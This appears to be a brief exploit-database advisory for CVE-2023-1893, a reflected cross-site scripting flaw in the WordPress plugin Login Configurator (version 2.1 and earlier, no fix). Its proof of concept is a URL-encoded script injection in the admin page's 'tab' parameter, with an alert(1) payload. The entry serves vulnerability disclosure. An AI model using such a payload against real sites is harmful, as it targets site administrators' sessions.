Share
## https://sploitus.com/exploit?id=PACKETSTORM:173723
Tittle:  
WordPress Plugin Login Configurator <= 2.1 - Reflected Cross-Site Scripting  
  
References:  
CVE-2023-1893  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.  
  
Affects Plugins:  
Login Configurator - No known fix - plugin closed  
  
Proof of Concept:  
  
Visit the following path:  
  
/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top   
  
  
Classification:  
Type XSS   
OWASP top 10 A7: Cross-Site Scripting (XSS)  
CWE-79  
  
wpScan:  
https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7